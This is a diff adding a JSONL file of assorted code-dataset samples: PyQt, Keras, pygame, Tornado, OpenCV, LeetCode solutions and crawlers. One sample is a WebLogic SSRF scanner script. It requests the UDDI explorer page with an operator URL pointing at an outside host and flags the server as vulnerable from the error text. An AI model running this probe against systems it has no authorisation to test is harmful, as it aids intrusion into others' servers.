diff --git "a/3485.jsonl" "b/3485.jsonl" new file mode 100644--- /dev/null +++ "b/3485.jsonl" @@ -0,0 +1,739 @@ +{"seq_id":"139520845","text":"from PyQt5.QtCore import pyqtSignal, QObject, QEvent, Qt\nfrom PyQt5.QtWidgets import QLabel\n\n\ndef clickable(widget):\n \"\"\"Filter which monitors clicks on qlabels which are icons\"\"\"\n class Filter(QObject):\n\n clicked = pyqtSignal(tuple, QLabel)\n\n def eventFilter(self, obj, event):\n\n if obj == widget:\n if event.type() == QEvent.MouseButtonDblClick:\n if obj.rect().contains(event.pos()):\n self.clicked.emit((0, obj), obj)\n return True\n elif event.type() == QEvent.MouseButtonPress: # right button\n if event.button() == Qt.RightButton:\n self.clicked.emit((1, obj), obj)\n return True\n return False\n\n clicking_filter = Filter(widget)\n widget.installEventFilter(clicking_filter)\n return clicking_filter.clicked\n","sub_path":"album/clickable_images.py","file_name":"clickable_images.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"582418764","text":"from behave import *\nfrom modules.warehouse import Warehouse\nimport json\n\n@given('For warehouses, I am connected to \"{url}\"')\ndef step_impl(context, url):\n context.url = url\n\n@when('For warehouses, I request the URL \"{endpoint}\"')\ndef step_impl(context, endpoint):\n context.endpoint = endpoint\n\n@step('For warehouses, I provide an object \"{data}\"')\ndef step_impl(context, data):\n data = json.loads(data)\n context.warehouse = Warehouse(context.url, **data)\n\n@then('For warehouses, I get a \"{code}\" result on \"{operation}\"')\ndef step_impl(context, code, operation):\n code = int(code)\n warehouse = Warehouse(context.url)\n if operation in ('find', 'insert'):\n if not hasattr(context, 'warehouse'):\n return False\n else:\n warehouse = context.warehouse\n if operation == 'insert':\n assert warehouse.insert(context.endpoint, code)\n if operation == 'find':\n assert warehouse.find(context.endpoint, code)\n if operation == 'all':\n assert warehouse.all(context.endpoint, code)\n return False\n","sub_path":"tests/features/steps/warehouse.py","file_name":"warehouse.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"500304182","text":"import sys\r\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLineEdit, QFormLayout, QListWidget, QPushButton, QSystemTrayIcon, \\\r\n QLabel\r\nfrom PyQt5.QtGui import QIcon, QKeyEvent\r\nfrom PyQt5.QtCore import Qt\r\nimport configparser\r\nimport os\r\nimport re\r\n\r\n\r\nclass Form(QWidget):\r\n def __init__(self):\r\n super(Form, self).__init__()\r\n self.lst = []\r\n self.edit = QLineEdit()\r\n self.edit.setPlaceholderText(\"Search\")\r\n self.list = QListWidget()\r\n self.resetconfig = QPushButton(\"Reset Config To Default\")\r\n self.flabel = QLabel('Found: 0')\r\n\r\n layout = QFormLayout()\r\n layout.addWidget(self.edit)\r\n layout.addWidget(self.list)\r\n layout.addWidget(self.resetconfig)\r\n layout.addWidget(self.flabel)\r\n self.setLayout(layout)\r\n\r\n self.edit.returnPressed.connect(self.search)\r\n self.resetconfig.clicked.connect(self.parseconfig)\r\n\r\n def keyPressEvent(self, QKeyEvent):\r\n if QKeyEvent.key() == Qt.Key_Escape:\r\n self.list.clear()\r\n self.edit.clear()\r\n\r\n def search(self):\r\n self.lst = []\r\n path = self.readconfig()\r\n searchname = self.edit.text()\r\n\r\n files = os.scandir(path['path'])\r\n for i in 
files:\r\n if re.search(searchname, i.path, re.IGNORECASE):\r\n self.lst.append(i.path)\r\n self.list.addItems(self.lst)\r\n self.flabel.setText(\"Found: \" + str(self.list.count()))\r\n\r\n def parseconfig(self):\r\n config = configparser.ConfigParser()\r\n config['settings'] = {\r\n 'path': 'D:\\osu!\\Songs',\r\n 'width': '500',\r\n 'height': '500'\r\n }\r\n with open('settings.ini', 'w') as configfile:\r\n config.write(configfile)\r\n\r\n def readconfig(self):\r\n config = configparser.ConfigParser()\r\n config.read('settings.ini')\r\n path = config['settings']\r\n return path\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n form = Form()\r\n\r\n wh = form.readconfig()\r\n form.setGeometry(200, 200, int(wh['width']), int(wh['height']))\r\n form.setWindowTitle('Search')\r\n form.setWindowIcon(QIcon('icons/Search.png'))\r\n QSystemTrayIcon(QIcon('icons/Search.png'))\r\n\r\n form.show()\r\n app.exec_()\r\n","sub_path":"Main.pyw","file_name":"Main.pyw","file_ext":"pyw","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"86181429","text":"\"\"\"\n6.4.1 LSTMで評判分析\nEpoch 10/10\n5668/5668 [==============================] - 9s 2ms/step - loss: 0.0021 - acc: 0.9995 - val_loss: 0.0459 - val_acc: 0.9880\n1418/1418 [==============================] - 0s 281us/step\nTest score: 0.046, accuracy: 0.988\n1 1 i want to be here because i love harry potter , and i really want a place where people take it serious , but it is still so much fun .\n1 1 because i would like to make friends who like the same things i like , and i really like harry potter , so i thought that joining a community like this would be a good start .\n1 1 so as felicia 's mom is cleaning the table , felicia grabs my keys and we dash out like freakin mission impossible .\n0 0 brokeback mountain was boring .\n0 0 not because i hate harry potter , but because i am the type of person that likes it when the main character dies .\n\n\"\"\"\n# -*- coding: utf-8 -*-\nfrom __future__ import division, print_function\nimport collections\nimport os\n\nimport nltk\nimport numpy as np\nfrom keras.callbacks import TensorBoard\nfrom keras.layers import Activation, Dense, Dropout, Embedding, LSTM\nfrom keras.models import Sequential\nfrom keras.preprocessing import sequence\nfrom sklearn.model_selection import train_test_split\nimport codecs\n\n\nDATA_DIR = \"./data\"\nLOG_DIR = \"./logs\"\n\nMAX_FEATURES = 2000\nMAX_SENTENCE_LENGTH = 40\n\nEMBEDDING_SIZE = 128\nHIDDEN_LAYER_SIZE = 64\nBATCH_SIZE = 32\nNUM_EPOCHS = 10\n\n# Read training data and generate vocabulary\nmaxlen = 0\nword_freqs = collections.Counter()\n# \"\"\"\n# import collections\n\n# l = ['a', 'a', 'a', 'a', 'b', 'c', 'c']\n# c = collections.Counter(l)\n\n# print(c)\n# # Counter({'a': 4, 'c': 2, 'b': 1})\n\n# でも以下の使い方を見る限り、要は辞書を作ってればいいので\n# word_freqs={}でも動くのでは?←most_commonのメソッドを使いたかったため\n# \"\"\"\nnum_recs = 0 # サンプル数に対応\nwith codecs.open(os.path.join(DATA_DIR, \"umich-sentiment-train.txt\"), \"r\",\n 'utf-8') as ftrain:\n for line in ftrain:\n label, sentence = line.strip().split(\"\\t\")\n try:\n words = nltk.word_tokenize(sentence.lower())\n except LookupError:\n print(\"Englisth tokenize does not downloaded. 
So download it.\")\n nltk.download(\"punkt\")\n words = nltk.word_tokenize(sentence.lower())\n maxlen = max(maxlen, len(words))\n for word in words:\n word_freqs[word] += 1\n num_recs += 1\n\n# Get some information about our corpus\nprint(maxlen) # 42\nprint(len(word_freqs)) # 2313\n# 自分の環境では>>> print(len(word_freqs)) 2328だった\n\n# 1 is UNK, 0 is PAD\n# We take MAX_FEATURES-1 features to account for PAD\n# 語彙は2000+2(UNKとPAD)個しようするものとする\n# ?なんでlen(word_freqs)じゃだめなんだろう\nvocab_size = min(MAX_FEATURES, len(word_freqs)) + 2\n# 頻出なのから対応する固有の番号を割り振る\nword2index = {x[0]: i+2 for i, x in\n enumerate(word_freqs.most_common(MAX_FEATURES))}\nword2index[\"PAD\"] = 0\nword2index[\"UNK\"] = 1\nindex2word = {v: k for k, v in word2index.items()}\n\n# 今は文章の羅列であるこれを数字の羅列に変換する\n# convert sentences to sequences\nX = np.empty((num_recs, ), dtype=list)\ny = np.zeros((num_recs, ))\ni = 0\nwith codecs.open(os.path.join(DATA_DIR, \"umich-sentiment-train.txt\"),\n 'r', 'utf-8') as ftrain:\n for line in ftrain:\n label, sentence = line.strip().split(\"\\t\")\n words = nltk.word_tokenize(sentence.lower())\n seqs = []\n for word in words:\n # もし辞書に単語があったら、対応する数字に直して、なかったらUNKにする.\n if word in word2index:\n seqs.append(word2index[word])\n else:\n seqs.append(word2index[\"UNK\"])\n X[i] = seqs # i番目のサンプルの文章に対応する数字の配列を作成\n y[i] = int(label)\n i += 1\n\n# Pad the sequences (left padded with zeros)\n# 左側に0を埋める\nX = sequence.pad_sequences(X, maxlen=MAX_SENTENCE_LENGTH)\n\n# Split input into training and test\nXtrain, Xtest, ytrain, ytest = train_test_split(X, y, test_size=0.2,\n random_state=42)\nprint(Xtrain.shape, Xtest.shape, ytrain.shape, ytest.shape)\n\n# Build model\nmodel = Sequential()\n# ここでの入力テンソルのshapeは(None, MAX_SENTENCE_LENGTH, 1)\n# 第一次元はバッチサイズに対応、指定なしなのでNone\n# 第二次元は時系列方向の長さに対応\n# 第三次元はある時刻の入力の要素数に対応(今はある数字が入っているだけなので1)\n\n# 埋め込みword2vec?\nmodel.add(Embedding(vocab_size, EMBEDDING_SIZE,\n input_length=MAX_SENTENCE_LENGTH))\n# 分散表現を獲得したことで、第三次元が変化\n# 入力テンソルは (None, MAX_SENTENCE_LENGTH, EMBEDDING_SIZE)となる。\nmodel.add(Dropout(0.5))\nmodel.add(LSTM(HIDDEN_LAYER_SIZE, dropout=0.5, recurrent_dropout=0.5))\n# LSTMの出力サイズはreturn_sequence=Trueで(None, HIDDEN_LAYER_SIZE, MAX_SENTENCE_LENGTH)になる\n# Falseの場合は(None, HIDDEN_LAYER_SIZE)となる。デフォではこっち(今回もこっち)\nmodel.add(Dense(1))\nmodel.add(Activation(\"sigmoid\"))\n\nmodel.compile(loss=\"binary_crossentropy\", optimizer=\"adam\",\n metrics=[\"accuracy\"])\n\n\nif not os.path.exists(LOG_DIR):\n os.mkdir(LOG_DIR)\n\nhistory = model.fit(Xtrain, ytrain, batch_size=BATCH_SIZE,\n epochs=NUM_EPOCHS,\n callbacks=[TensorBoard(LOG_DIR)],\n validation_data=(Xtest, ytest))\n\n# evaluate\nscore, acc = model.evaluate(Xtest, ytest, batch_size=BATCH_SIZE)\nprint(\"Test score: {:.3f}, accuracy: {:.3f}\".format(score, acc))\n\nfor i in range(5):\n idx = np.random.randint(len(Xtest))\n xtest = Xtest[idx].reshape(1, 40)\n ylabel = ytest[idx]\n ypred = model.predict(xtest)[0][0]\n sent = \" \".join([index2word[x] for x in xtest[0].tolist() if x != 0])\n print(\"{:.0f}\\t{:.0f}\\t{}\".format(ypred, ylabel, sent))\n","sub_path":"ch06/umich_sentiment_lstm.py","file_name":"umich_sentiment_lstm.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"360065574","text":"import pygame, sys\nfrom pygame.locals import *\nfrom random import randint # Importar random\n\npygame.init()\nventana = pygame.display.set_mode((1000, 800))\npygame.display.set_caption(\"Hola Mundo\")\n\nMi_Imagen = 
pygame.image.load(\"Imagenes/12279747422081422452rg1024_Ufo_in_metalic_style.svg.hi.png\")\nposX, posY = 200, 100\nvelocidad = 2\nBlanco = (255, 255, 255)\nderecha = True\n\nwhile True:\n ventana.fill(Blanco)\n ventana.blit(Mi_Imagen, (posX, posY))\n for evento in pygame.event.get():\n if evento.type == QUIT:\n pygame.quit()\n sys.exit()\n\n if derecha == True:\n if posX < 800:\n posX += velocidad\n else:\n derecha == False\n else:\n if posX > 1:\n posX -= velocidad\n else:\n derecha == True\n\n pygame.display.update()\n","sub_path":"PygameTuto/Movimiento.py","file_name":"Movimiento.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"307966327","text":"# ilang - Inference Language\n# Stefano Pedemonte\n# Aalto University, School of Science, Helsinki\n# Oct 2013, Helsinki \n\n\nimport _thread as thread\nimport http.server as BaseHTTPServer\nimport socketserver as SocketServer\n\nhost = '0.0.0.0'\nport = 8080\n\ndef serve(host,port):\n handler = BaseHTTPServer.SimpleHTTPRequestHandler\n SocketServer.TCPServer.allow_reuse_address = True\n server = SocketServer.TCPServer((host, port), handler, bind_and_activate=False)\n server.allow_reuse_address=True\n try:\n server.server_bind()\n server.server_activate()\n print(\"serving at port:\" + str(port))\n server.serve_forever()\n except:\n server.server_close()\n\ndef run_webserver(background):\n try:\n if background:\n thread.start_new_thread(serve, (host,port))\n else:\n serve(host,port)\n except:\n print('server already running')\n\n\n","sub_path":"src/tomolab/tomolab/_removed/ilang/webgui/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"76568256","text":"'''\r\nCreated on Jan 2, 2010\r\n\r\n@author: gumuz\r\n'''\r\n\r\n\r\nCONNECTION_TYPES = [\"None\", \"STARTTLS\"]\r\nSIZES = {\"KB\":1024, \"MB\":1048576}\r\nPRESETS = [{\"domains\":[\"gmail.com\"],\r\n \"host_name\":\"smtp.gmail.com\",\r\n \"port\":587,\r\n \"max_size\":25,\r\n \"max_size_type\":\"MB\",\r\n \"use_auth\":True,\r\n \"security\":\"STARTTLS\"},\r\n {\"domains\":[\"hotmail.com\", \"live.com\"],\r\n \"host_name\":\"smtp.live.com\",\r\n \"port\":587,\r\n \"max_size\":10,\r\n \"max_size_type\":\"MB\",\r\n \"use_auth\":True,\r\n \"security\":\"STARTTLS\"}, ]\r\n\r\nclass KurirAccount(object):\r\n def __init__(self):\r\n self.from_address = \"\"\r\n self.host_name, self.port = \"\", 25\r\n self.max_size, self.max_size_type = 2, \"MB\"\r\n self.use_auth, self.security = False, \"None\"\r\n self.username, self.password = \"\", \"\"\r\n\r\n \r\n def get_max_size_bytes(self):\r\n return self.max_size * SIZES[self.max_size_type]\r\n max_size_bytes = property(get_max_size_bytes)\r\n","sub_path":"src/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"31929697","text":"import argparse\nimport os\nimport server.app\n\nfrom config import cfg\nfrom server.app import app\nfrom server.api.processor import SegmentationProcessor\nfrom utils import setup_logger\n\n\nparser = argparse.ArgumentParser(\n description='Run image segmentation server'\n)\n# Server settings\nparser.add_argument(\n '--host',\n type=str,\n default='0.0.0.0',\n help='Host address'\n)\nparser.add_argument(\n '--port',\n type=int,\n default=5050,\n help='Listening 
port'\n)\n# Processor settings\nparser.add_argument(\n '--gpu',\n default=0,\n type=int,\n help='Gpu id'\n)\nparser.add_argument(\n \"--cfg\",\n default=\"config/ade20k-resnet50dilated-ppm_deepsup.yaml\",\n metavar=\"FILE\",\n help=\"Path to config file\",\n type=str,\n)\nparser.add_argument(\n \"opts\",\n help=\"Modify config options using the command-line\",\n default=None,\n nargs=argparse.REMAINDER,\n)\n\n\ndef main():\n args = parser.parse_args()\n\n cfg.merge_from_file(args.cfg)\n cfg.merge_from_list(args.opts)\n\n cfg.RUNTIME.gpu = args.gpu\n\n logger = setup_logger(distributed_rank=0)\n logger.info(\"Loaded configuration file {}\".format(args.cfg))\n logger.info(\"Running with config:\\n{}\".format(cfg))\n\n cfg.MODEL.arch_encoder = cfg.MODEL.arch_encoder.lower()\n cfg.MODEL.arch_decoder = cfg.MODEL.arch_decoder.lower()\n\n # absolute paths of model weights\n cfg.MODEL.weights_encoder = os.path.join(\n cfg.DIR, 'encoder_' + cfg.TEST.checkpoint)\n cfg.MODEL.weights_decoder = os.path.join(\n cfg.DIR, 'decoder_' + cfg.TEST.checkpoint)\n\n assert os.path.exists(cfg.MODEL.weights_encoder) and \\\n os.path.exists(cfg.MODEL.weights_decoder), \"checkpoint does not exitst!\"\n\n server.app.processor = SegmentationProcessor(cfg)\n with server.app.processor:\n app.run(host=args.host, port=args.port)\n","sub_path":"server/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"78648198","text":"#!/usr/bin/env python\n# coding:utf-8\n\nfrom django.conf.urls import url, include\nfrom views import *\n\nurlpatterns = [\n url(r'^login/$', login),\n url(r'^index/$', index),\n url(r'^register/$', register),\n url(r'^host/$', host),\n]","sub_path":"mysite/hosts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"86492866","text":"import cv2 \r\nimport os\r\nimport numpy as np\r\n\r\npath = 'C:/Users/HS/Pictures/Image/'\r\n\r\nclass CompareIMG:\r\n def __init__(self):\r\n print('Start')\r\n pass\r\n \r\n def binIMG(self, img):\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n ret, dst = cv2.threshold(gray, 100, 255, cv2.THRESH_BINARY) \r\n \r\n if ret:\r\n return dst\r\n else:\r\n print(\"Failed read image!\")\r\n exit()\r\n \r\n def diffIMG(self, img1, img2):\r\n img1 = self.binIMG(img1)\r\n detector = cv2.ORB_create()\r\n kp1, desc1 = detector.detectAndCompute(img1, None)\r\n #print(len(desc1))\r\n while 1:\r\n ret, img = img2.read()\r\n \r\n if not ret:\r\n print(\"Failed open Video!\")\r\n break\r\n \r\n vid = self.binIMG(img)\r\n \r\n kp2, desc2 = detector.detectAndCompute(vid, None)\r\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\r\n matches = matcher.match(desc1, desc2)\r\n \r\n matches = sorted(matches, key=lambda x:x.distance)\r\n \r\n src_pts = np.float32([ kp1[m.queryIdx].pt for m in matches ])\r\n dst_pts = np.float32([ kp2[m.trainIdx].pt for m in matches ])\r\n \r\n mtrx, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)\r\n \r\n h,w = img1.shape[:2]\r\n \r\n pts = np.float32([ [[0,0]],[[0,h-1]],[[w-1,h-1]],[[w-1,0]] ])\r\n dst = cv2.perspectiveTransform(pts,mtrx)\r\n img = cv2.polylines(img,[np.int32(dst)],True,255,3, cv2.LINE_AA)\r\n \r\n cv2.imshow('Result', img)\r\n \r\n if cv2.waitKey(55) == 27:\r\n break\r\n \r\n print(\"End\")\r\n cv2.destroyAllWindows()\r\n \r\n def Run(self):\r\n #파일 경로\r\n filepath1 = path + 
'n5.jpg' #찾고싶은대상\r\n filepath2 = path + 'n8.mp4' #비교 영상\r\n \r\n self.img1 = cv2.imread(filepath1) #찾고싶은대상\r\n self.img2 = cv2.VideoCapture(filepath2) #비교 영상\r\n \r\n if self.img1 is None or self.img2 is None:\r\n print('Image load failed!')\r\n os.sys.exit()\r\n \r\n self.diffIMG(self.img1, self.img2)\r\n\r\nif __name__ == '__main__':\r\n cpimg = CompareIMG()\r\n cpimg.Run()\r\n\r\n","sub_path":"Object_Tracking/특징점 매칭/Case1/Matching.py","file_name":"Matching.py","file_ext":"py","file_size_in_byte":2432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"491143269","text":"\"\"\"\nhttps://leetcode.com/problems/binary-tree-maximum-path-sum\n\"\"\"\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n def maxPathSum(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n self.res = 0 - 2 ** 31\n\n\n def _helper(node):\n if not node:\n return 0\n\n sum_l, sum_r = max(0, _helper(node.left)), max(0, _helper(node.right))\n sum_n = node.val + sum_l + sum_r\n if sum_n > self.res:\n self.res = sum_n\n return node.val + max(sum_l, sum_r)\n\n _helper(root)\n return self.res\n\n\n def maxPathSum_2(self, root):\n self.res = 0 - 2 ** 31\n self.path = None\n\n def _helper(node):\n if not node:\n return 0, None\n sum_l, path_l = _helper(node.left)\n if sum_l <= 0:\n sum_l = 0\n path_l = None\n sum_r, path_r = _helper(node.right)\n if sum_r <= 0:\n sum_r = 0\n path_r = None\n sum_n = node.val + sum_l + sum_r\n if sum_n > self.res:\n self.res = sum_n\n self.path = TreeNode(node.val)\n self.path.left, self.path.right = path_l, path_r\n path_n = TreeNode(node.val)\n if sum_l > sum_r:\n path_n.left = path_l\n return node.val + sum_l, path_n\n else:\n path_n.right = path_r\n return node.val + sum_r, path_n\n\n _helper(root)\n return self.path\n\nroot = TreeNode(-5)\nn2 = TreeNode(-2)\nn3 = TreeNode(-3)\nn4 = TreeNode(-2)\nroot.left, root.right = n2, n3\nn2.left = n4\nprint(Solution().maxPathSum_2(root))\n\n\n","sub_path":"leetcode/facebook/binary-tree-maximum-path-sum.py","file_name":"binary-tree-maximum-path-sum.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"323449726","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = 'orleven'\n\nimport urllib.parse\nimport requests\nrequests.packages.urllib3.disable_warnings()\n\ndef get_script_info(data=None):\n script_info = {\n \"name\": \"weblogic ssrf\",\n \"info\": \"weblogic ssrf.\",\n \"level\": \"high\",\n \"type\": \"info\"\n }\n return script_info\n\ndef prove(data):\n data = init(data,'web')\n if data['base_url']:\n url = data['base_url']+'uddiexplorer/SearchPublicRegistries.jsp?operator=http://www.orleven.com/robots.txt&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search'\n try:\n res = requests.get(url, headers=data['headers'], verify=False, timeout=data['timeout'])\n if \"weblogic.uddi.client.structures.exception.XML_SoapException\" in res.text :\n data['flag'] = 1\n data['data'].append({\"page\": '/uddiexplorer/SearchPublicRegistries.jsp'})\n data['res'].append({\"info\": url, \"key\": \"/uddiexplorer/SearchPublicRegistries.jsp\"})\n except:\n pass\n return 
data\n","sub_path":"script/web/weblogic_ssrf.py","file_name":"weblogic_ssrf.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"135019391","text":"# Restaurant\n\n# in order to import from a subfolder need to touch a __init__.py file in that\n# folder.\n\nfrom classes.restaurant import *\n\nrestaurant = Restaurant(\"Yoshinoya\", \"Japanese\")\n\nprint (\"Name : \" + restaurant.restaurant_name)\nprint (\"Cuisine Type : \" + restaurant.cuisine_type)\n\nrestaurant.describe_restaturant()\nrestaurant.open_restaurant()\n","sub_path":"crash_course/ch_9_classes/9.1.py","file_name":"9.1.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"180815957","text":"from igraph import Graph, STRONG\n\n\ndef count(db, height_from, height_to):\n blocks = get_blocks(db, height_from, height_to)\n edges = get_edges_from_blocks(blocks)\n graph = get_graph_from_edges(edges)\n v_counts = get_separate_graphs_counts(graph)\n v_counts.sort(reverse=True)\n return v_counts\n\n\ndef get_blocks(db, height_from, height_to):\n blocks = []\n query = db.blocks.find({'height': {'$gte': height_from, '$lte': height_to}})\n for block in query:\n blocks.append(block)\n return blocks\n\n\ndef get_edges_from_blocks(blocks):\n edges = []\n for block in blocks:\n for tx in block['transactions']:\n for inpt in tx['inputs']:\n for inp_addr in inpt['addresses']:\n for outpt in tx['outputs']:\n for out_addr in outpt['addresses']:\n if None not in (inp_addr, out_addr):\n edges.append((\n inp_addr['address'],\n out_addr['address'],\n ))\n return edges\n\n\ndef get_graph_from_edges(edges):\n graph = Graph()\n for edge in edges:\n for vertex in edge:\n graph.add_vertex(name=vertex)\n graph.add_edge(edge[0], edge[1])\n return graph\n\n\ndef get_separate_graphs_counts(graph):\n v_counts = []\n for graph in graph.decompose(mode=STRONG):\n v_counts.append(graph.vcount())\n return v_counts\n","sub_path":"web-api/src/functions/count_separate_graphs.py","file_name":"count_separate_graphs.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"159020395","text":"from typing import List\n\nclass Solution:\n def sequentialDigits(self, low: int, high: int) -> List[int]:\n ret = []\n if self.verifySequence(low):\n ret.append(low)\n x = self.nextSequence(low)\n while x <= high:\n ret.append(x)\n x = self.nextSequence(x)\n if self.verifySequence(high) and high not in ret:\n ret.append(high)\n return ret\n \n def verifySequence(self, num):\n num_str = str(num)\n prev_digit = int(num_str[0])\n length = len(num_str)\n for n in range(1, length):\n next_digit = int(num_str[n])\n if prev_digit+1 != next_digit:\n return False\n prev_digit = next_digit\n return True\n \n def nextSequence(self, num):\n ret = 0\n num_str = str(num)\n digit = int(num_str[0])\n length = len(num_str)\n if length > 10:\n return float(\"inf\")\n if digit+length > 10:\n return self.nextSequence(1*(10**(length)))\n for n in range(length):\n ret = ret * 10 + digit\n digit += 1\n if ret <= num:\n return self.nextSequence(num+(1*(10**(length-1)))-int(num_str[1:]))\n return ret\n\n\nprint(Solution().sequentialDigits(100, 300))\nprint(Solution().sequentialDigits(1000, 13000))\nprint(Solution().sequentialDigits(10, 1000000000))\nprint(Solution().sequentialDigits(58, 155))\nprint(Solution().sequentialDigits(123, 
123))\nprint(Solution().sequentialDigits(234, 2314))\nprint([234,345,456,567,678,789,1234])\n# print(Solution().nextSequence(100000000))\n# print(Solution().verifySequence(123456789))\n# print(Solution().verifySequence(123446789))\n","sub_path":"Daily Challenge/Sequential Digits.py","file_name":"Sequential Digits.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"360085175","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport random\nimport _thread\nimport time\n\nvisited = []\ndef get_links(thread_name, bs):\n print('Getting links in {}'.format(thread_name))\n links = bs.find('div', {'id':'bodyContent'}).find_all('a',\n href=re.compile('^(/wiki/)((?!:).)*$'))\n return [link for link in links if link not in visited]\n\n\n# Define uma função para a thread\ndef scrape_article(thread_name, path):\n html = urlopen('http://en.wikipedia.org{}'.format(path))\n time.sleep(5)\n bs = BeautifulSoup(html, 'html.parser')\n title = bs.find('h1').get_text()\n print('Scraping {} in thread {}'.format(title, thread_name))\n links = get_links(thread_name, bs)\n if len(links) > 0:\n newArticle = links[random.randint(0, len(links)-1)].attrs['href']\n print(newArticle)\n scrape_article(thread_name, newArticle)\n\n# Cria duas threads conforme definidas a seguir\ntry:\n _thread.start_new_thread(scrape_article, ('Thread 1', '/wiki/Kevin_Bacon',))\n _thread.start_new_thread(scrape_article, ('Thread 2', '/wiki/Monty_Python',))\nexcept:\n print('error: unable to start threads')\n\nwhile 1:\n pass\n","sub_path":"Capitulo16/testcrawlingthreads_v2.py","file_name":"testcrawlingthreads_v2.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"22634915","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:hua\n# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:hua\nimport requests\nimport json\nimport time\n# url = \"http://192.168.100.106:5000/sklearn\"\nurl = \"http://127.0.0.1:5000/LGRS/LGB\"\n# url = \"http://192.168.11.220:5000/sklearn\"\nstart_time = time.time()\ndata = {\n \"data\": [\n {\"filename\": \"420testdata.csv\"},\n {\"tab_list\":['住院天数', '年龄', '咳嗽', '流涕', '呼吸音粗', '性别'],\"vars_c\":['住院天数', '年龄'],\"vars_d\":['咳嗽', '流涕', '呼吸音粗'],\"target\":['性别']}\n # {\"vars_c\":['住院天数', '年龄']},\n # {\"vars_d\":['咳嗽', '流涕', '呼吸音粗']},\n # {\"target\":['性别']},\n # {\"testdata\":None},\n # {\"n_neighbors\":6}\n ]\n}\ndata = json.dumps(data, ensure_ascii=True)\nheaders = {'Content-Type': 'application/json'}\nresponse = requests.post(url, data, headers=headers)\n\ndata1 = response.content.decode(encoding=\"unicode-escape\")\n# data1 = response.content.decode(encoding=\"utf-8\")\n\n# 获取key为中文的返回值\n# data2 = json.loads(data1)\n# 提取第一个表的信息\n# data3 = data2[\"yy\"]\nprint(data1)\nend_time = time.time()\ntimes = end_time - start_time\nprint(times)\n","sub_path":"Ubuntu_code/Machine_Learning_test/KNN客户端.py","file_name":"KNN客户端.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"22067055","text":"# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport signal\nimport logging\n\nfrom tornado.ioloop import IOLoop\nfrom tornado.options import options, define, parse_command_line, parse_config_file\nfrom tornado.web import Application\n\nimport routing\nfrom assets import AssetsHandler\nfrom 
handlers.error import ErrorHandler\nfrom widgets import topbar\n\ndefine(\"port\", 8880)\ndefine(\"debug\", default=False, type=bool)\ndefine(\"auto_reload\", default=False, type=bool)\n\n\ndef local_file(*path):\n root = os.path.dirname(os.path.abspath(__file__))\n return os.path.join(root, *path)\n\ntry:\n parse_config_file(local_file(\"config\", \"server.conf\"))\nexcept IOError:\n logging.info(\"No specific config file loaded\")\n\nparse_command_line()\n\napp_settings = {\n \"debug\": options.debug,\n \"auto_reload\": options.auto_reload,\n \"ui_modules\": [topbar, ],\n \"static_handler_class\": AssetsHandler,\n \"static_url_prefix\": \"/static/\",\n \"static_path\": local_file(\"web\"),\n \"template_path\": local_file(\"templates\"),\n \"default_handler_class\": ErrorHandler,\n}\n\n\ndef signal_handler(signal_num, frame):\n IOLoop.instance().stop()\n logging.info(\"IO loop stoped\")\n\n\nif __name__ == '__main__':\n app = Application(routing.rules, **app_settings)\n signal.signal(signal.SIGINT, signal_handler)\n signal.signal(signal.SIGTERM, signal_handler)\n app.listen(options.port)\n 